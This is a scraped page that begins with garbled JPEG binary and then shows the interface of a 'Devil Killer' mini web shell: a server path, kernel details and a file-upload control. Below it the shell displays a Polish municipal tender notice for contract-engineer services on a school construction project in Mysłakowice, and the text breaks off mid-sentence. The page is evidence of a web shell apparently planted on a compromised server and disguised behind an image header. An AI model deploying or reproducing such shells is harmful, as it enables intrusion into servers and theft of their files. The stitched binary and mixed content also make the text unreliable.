JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240716/0041481601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie funkcji Inżyniera Kontraktu nad zadaniem inwestycyjnym pn. „Budowa Szkoły Podstawowej w Mysłakowicach – etap IX” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi zamawiający centralny</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Mysłakowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821701</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szkolna 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mysłakowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-533</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pzp@myslakowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://myslakowice.bip.net.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie funkcji Inżyniera Kontraktu nad zadaniem inwestycyjnym pn. „Budowa Szkoły Podstawowej w Mysłakowicach – etap IX” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7932f82a-9e17-4257-90f7-8f5f526800c8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00414816</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00021343/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 PEŁNIENIE FUNKCJI INŻYNIERA KONTRAKTU NAD ZADANIEM INWESTYCYJNYM PN „BUDOWA SZKOŁY PODSTAWOWEJ W MYSŁAKOWICACH – ETAP IX</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7932f82a-9e17-4257-90f7-8f5f526800c8 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu<br/>komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu portalu ezamówienia https://ezamowienia.gov.pl/,<br/>ePUAPU https://epuap.gov.pl/wps/portal oraz poczty elektronicznej - pzp@myslakowice.pl (przy czym ten sposób komunikacji nie<br/>jest właściwy dla oferty oraz dokumentów składanych wraz z ofertą). Uczestnicy postępowania składając ofertę akceptują<br/>postanowienia:<br/>a) Regulaminu korzystania z systemu ezamówienia – dostępnego pod adresem: https://ezamowienia.gov.pl/pl/regulamin/<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie niniejszego zamówienia publicznego musi posiadać konto na<br/>e-PUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty oraz do formularza<br/>do komunikacji.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z portalu ezamówienia oraz<br/>Regulaminie ePUAP.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, wymiany, wycofania oferty<br/>lub wniosku oraz do komunikacji wynosi 150 MB.<br/>5. Za datę przekazania oferty, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>6. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się nr ogłoszenia<br/>(BZP lub ID postępowania).<br/>7. Skrytka e-PUAP Zamawiającego: /Myslakowice/SkrytkaESP<br/>8. Adres strony internetowej, na której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia<br/>bezpośrednio związane z postępowaniem o udzielenie zamówienia: https://myslakowice.bip.net.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE L z 2016 r.<br/>Nr119, str. 1 z późn.zm.), dalej „RODO”, informuję, że: • administratorem Pani/Pana danych<br/>osobowych jest Gmina Mysłakowice, 58-533 Mysłakowice ul. Szkolna 5• inspektorem ochrony danych<br/>osobowych w Gminie Mysłakowice jest RODOSTAR Dawid Kaszuba, ul. Przepiórek 10, 41-215<br/>Sosnowiec •Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego pn. Pełnienie funkcji Inżyniera<br/>Kontraktu nad zadaniem inwestycyjnym pn. PEŁNIENIE FUNKCJI INŻYNIERA KONTRAKTU NAD ZADANIEM INWESTYCYJNYM<br/>PN „BUDOWA SZKOŁY PODSTAWOWEJ W MYSŁAKOWICACH – ETAP IX&#34;,<br/>Znak sprawy: RGK.ZP.271.09.2024 prowadzonym w trybie podstawowym bez negocjacji, •odbiorcami<br/>Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (tj.<br/>Dz. U. z 2023 r. poz. 1605 z póź. zm.), dalej „ustawa Pzp”; • Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78<br/>ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a<br/>jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGK.ZP.271.09.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa polegająca na pełnieniu funkcji Inżyniera Kontraktu nad zadaniem inwestycyjnym pn. „Budowa Szkoły Podstawowej w Mysłakowicach – etap IX”.<br/>2. Planowany zakres inwestycji: roboty budowlane polegające na wykonaniu etapu <br/>IX-go budowy Szkoły Podstawowej w Mysłakowicach na dz. nr 618/33 obręb 0009 Mysłakowice, obejmującego: <br/>1) Zagospodarowanie terenu (drogi, architektura):<br/>a)	dostawę i montaż wiaty śmietnikowej,<br/>b)	dostawę i montaż masztów – 3 kpl.;<br/>c)	wykonanie ogrodzenia placów zabaw z trzema furtkami, <br/>d)	dostawę i montaż małej architektury:<br/>1. ławki – 25 szt.<br/>2. kosze na śmieci – 10 szt.<br/>3. stojaków na rowery – 40 stanowisk;<br/>4. tablic informacyjnych wg wytycznych zamawiającego o wymiarach 80x120 cm – 9 kpl;<br/>e) wycieraczki zewnętrzne - 9 kpl.;<br/>f) wyrównanie terenu przy istniejącej siłowni zewnętrznej poprzez wykonanie nawierzchni trawiastej - 800 m2,<br/>g) wykonanie chodnika siłowni zewnętrznej – 34 m2;<br/>h) wykonanie chodników przy budynku wzdłuż placów zabaw; <br/>2) Instalacje sanitarne – zagospodarowanie terenu:<br/>Podłączenie odwodnienia przy Sali sportowej;<br/><br/>3) Instalacje elektryczne – zagospodarowanie terenu:<br/>Dostawa i montaż ZK wraz z oświetleniem zewnętrznym punkty: ZKO/3/6, ZKO/3/8, 0T5/O1 (5 punktów oświetleniowych), ZKO/1/1, ZKO/1/2, ZKO/1/3, ZKO/1/4, ZKO/1/5, ZKO/1/6, ZKO/1/7, ZKO/1/8, ZKO/1/9, ZKO/1/10, ZKO/1/11, ZKO/1/12, ZKO/1/13, ZKO/1/14, ZKO/1/15, ZKO/1/16; <br/><br/>4) Branża Architektoniczno-budowlana – budynek:<br/>Wykonanie kompletnego wykończeniu wewnętrznego dla części budynku opisanego osiami od B.01 do B.10; w tym szczególnie:<br/>a) wykonanie okładzin podłogowych wraz z cokołami w tym okładzin schodów;<br/>b) wykonanie wszelkich sufitów podwieszanych, obudów i wraz z rewizjami i infrastrukturą instalacyjną;<br/>c) wykonanie powłok malarskich ścian w tym impregnacja powłok betonowych;<br/>d)wykonanie okładzin ścian w tym luster wklejanych;<br/>e) wykonanie ślusarki/stolarki drzwiowej wewnętrznej wraz z wyposażeniem;<br/>f) wykonanie ścianek kabin sanitarnych;<br/>g) dostawa wyposażenia pomieszczeń sanitarno-higienicznych<br/>h) dostawa i montaż „białego montażu” urządzeń sanitarnych wraz z bateriami;<br/>i) dostawa i montaż wyposażenia sanitarnego;<br/>j) wykonanie informacji wizualnej budynku;<br/>k) wykonanie balustrad schodowych;<br/>l) dostawę i montaż odbojnic i zabudów grzejników;<br/>m) demontaż ścian na obu poziomach budynku dzielących hol i korytarz od użytkowanej części budynku;<br/>n) w osiach B.01 – B.10 należy dostosować istniejącą ślusarkę drzwiową w klamki antypaniczne; <br/>o) oznakowanie;<br/>p) dostawa i montaż sprzętu gaśniczego;<br/>r) opracowanie scenariusza pożarowego;<br/>s) uzyskanie pozwolenia na użytkowanie budynku w osiach B.01 – B.10 wraz z zagospodarowaniem terenu dz. nr 618/33. <br/><br/>5) Instalacje sanitarne – budynek<br/>a) wykonanie kompletnej wewnętrznej instalacji wody zimnej, ciepłej i cyrkulacji budynku w osiach od B.01 do B.10;<br/>b) wykonanie wewnętrznej instalacji wodnej ppoż. wraz z skrzynkami hydrantowymi z wężem dla obejmującej wyposażenie i zabezpieczenie całego obiektu;<br/>c) wykonanie wewnętrznej kanalizacji sanitarnej budynku w osiach od B.01 do B.10;<br/>d) wykonanie wewnętrznej instalacji wentylacji mechanicznej w osiach od B.01 do B.10;<br/>e) wykonanie instalacji ogrzewania wraz z montażem grzejników w osiach od B.01 do B.10;<br/>f) wyposażenie toalet (min. mydelniczki, kosze itp.);<br/><br/>6) Instalacje elektryczne – budynek<br/>a) Montaż instalacji wewnętrznych między osiami B.01 - B.10;<br/>1. Instalacje gniazd wtykowych, wypustów zasilających;<br/>2. Instalacja oświetlenia podstawowego i awaryjnego;<br/>3. Instalacja nagłośnienia;<br/>4. Instalacja SSWIN, instalacja CCTV w zakresie osi B.01 - B.10;<br/>5. Instalacja LAN;<br/>6. Montaż koryt kablowych;<br/>7. instalacja połączeń wyrównawczych<br/>b) Okablowanie instalacji rolet wraz z urządzeniami sterującymi pozwalające na kompatybilne funkcjonowanie w ramach istniejącego systemu z częścią zarządzającą znajdującą się w segmencie „I” obiektu w osiach od B.01 do B.10;<br/>c) Montaż kompletnej instalacji oddymiania grawitacyjnego klatki schodowej wraz z zasileniem dla części budynku „I” w osiach od B.01 do B.10; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi kryteriami i wagami:<br/>- kryterium obowiązujące: cena waga: 60 pkt<br/>- kryterium przedmiotowe: Dyspozycyjność Inspektora nadzoru w specjalności konstrukcyjno-budowlanej waga 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dyspozycyjność Inspektora nadzoru w specjalności konstrukcyjno-budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu, na zasadach określonych w<br/>Rozdziale X SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. Warunki udziału w postępowaniu dotyczą:<br/>a) Zdolność do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia warunku w powyższym zakresie;<br/>b) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie stawia warunku w powyższym zakresie;<br/>c) Sytuacji ekonomicznej lub finansowej<br/>Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż<br/>100 000 PLN;<br/>d) Zdolności technicznej lub zawodowej<br/>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować po jednej<br/>osobie na każde z wymienionych poniżej stanowisk:<br/>a. Kierownik Zespołu Inżyniera Kontraktu – inspektor nadzoru specjalności konstrukcyjno-budowlanej<br/>Wymagane kwalifikacje:<br/>- uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności budowlanokonstrukcyjnej<br/>(lub posiadającego równoważne kwalifikacje zawodowe uznane na zasadach określonych zgodnie z<br/>przepisami prawa polskiego),<br/>- członkostwo (stałe bądź tymczasowe) w Okręgowej Izbie Inżynierów Budownictwa<br/>Doświadczenie:<br/>- co najmniej 10-letnie doświadczenie zawodowe (licząc od dnia uzyskania uprawnień) w nadzorowaniu robót budowlanych<br/>lub kierowaniu budową<br/>- w okresie ostatnich 10 lat przed upływem terminu składania ofert pełnienie funkcji Kierownika budowy lub Inspektora<br/>nadzoru inwestorskiego w specjalności konstrukcyjno-budowlanej nad co najmniej jedną inwestycją o wartości nie mniejszej<br/>niż 5 mln zł brutto.<br/>b. Inspektor nadzoru w specjalności sanitarnej<br/>Wymagane kwalifikacje:<br/>- uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej<br/>w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (lub<br/>posiadającego równoważne kwalifikacje zawodowe uznane na zasadach określonych zgodnie z przepisami prawa<br/>polskiego)<br/>- członkostwo (stałe bądź tymczasowe) w Okręgowej Izbie Inżynierów Budownictwa<br/>Doświadczenie:<br/>- co najmniej 10-letnie doświadczenie zawodowe (liczone od dnia uzyskania uprawnień), w kierowaniu budową lub<br/>nadzorowaniu robót budowlanych w specjalności sanitarnej<br/>- w okresie ostatnich 10 lat przed upływem terminu składania ofert doświadczenie w nadzorowaniu co najmniej jednej<br/>zakończonej inwestycji w zakresie odpowiadającym posiadanym uprawnieniom, o wartości nadzorowanej inwestycji nie<br/>mniejszej niż 2 mln zł brutto.<br/>c. Inspektor nadzoru w specjalności elektrycznej<br/>Wymagane kwalifikacje:<br/>- uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej<br/>w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (lub posiadającego równoważne kwalifikacje<br/>zawodowe uznane na zasadach określonych zgodnie z przepisami prawa polskiego)<br/>- członkostwo (stałe bądź tymczasowe) w Okręgowej Izbie Inżynierów Budownictwa<br/>Doświadczenie:<br/>- co najmniej 10-letnie doświadczenie zawodowe (liczone od dnia uzyskania uprawnień) w kierowaniu budową lub<br/>nadzorowaniu robót budowlanych w specjalności elektrycznej<br/>- w okresie ostatnich 10 lat przed upływem terminu składania ofert doświadczenie w nadzorowaniu co najmniej jednej<br/>zakończonej inwestycji w zakresie odpowiadającym posiadanym uprawnieniom, o wartości nadzorowanej inwestycji nie<br/>mniejszej niż 500 000 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie<br/>Wykonawcy w zakresie art. 108 ust. 1 pkt 5 p.z.p., o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej<br/>grupy kapitałowej - załącznik nr 6 do SWZ;<br/>2) Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu<br/>składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności;<br/>3) Zaświadczenie albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 